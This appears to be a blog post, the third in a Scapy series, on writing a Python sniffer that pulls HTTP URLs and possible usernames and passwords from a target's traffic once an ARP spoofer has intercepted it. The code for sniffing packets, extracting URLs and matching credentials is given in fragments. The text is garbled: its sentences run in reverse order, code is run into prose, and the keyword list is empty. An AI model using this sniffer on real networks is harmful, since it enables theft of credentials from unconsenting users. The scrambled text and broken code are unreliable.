Load field contains a lot of information.
If condition detects if there Raw layer present, and assign load field to load variable.
Information as username and password is located in a Raw layer of the package in load field. Next function which we are going get_credentials def get_credentials(packet): if packet.haslayer(scapy.Raw): load = packet.load keywords = for keyword in keywords: if keyword in load: return load To get full requested URL these two fields need to be combined into one. Host it is a domain name and Path it is a rest of URL. def get_url(packet): return packet.Host + packet.PathĮach packet has two fields as Host and Path. To get this data from packet we are going to use two more functions get_url and get_credentials. This function is going to get requested URL and user credentials and display the result in terminal. We are using http.HTTPRequest method of scapy_http package to filter only packages from HTTP layer. def process_packets(packet): if packet.haslayer(http.HTTPRequest): url = get_url(packet) print(" Http Request > " + url) credentials = get_credentials(packet) if credentials: print(" Possible username/passowrd" + credentials + "\n\n")Įach received packet contain many layers. process_packets do not exist yet, let’s create it. Prn - function name which will be used for packets processing. Iface - network interface which scapy going to monitor def sniff_packet(interface): scapy.sniff(iface=interface, store=False, prn=process_packets) To sniff packets we are going to use sniff method from scapy package. import scapy.all as scapy from scapy_http import http import argparse Also, we are going to use argparse to have possibility run script with command line parameters. pip install scapy_httpĪs usually we need to import scapy and scapy_http at the top of python file. You need to use python 2 in order to use this package. To make sniffer work we need to install one more python package. We are going to write packer sniffer which will allow get information from target host using previously created arp spoofer and packet sniffer. Hello friend, this is a part 3 of my post series about Scapy.
0 kommentar(er)
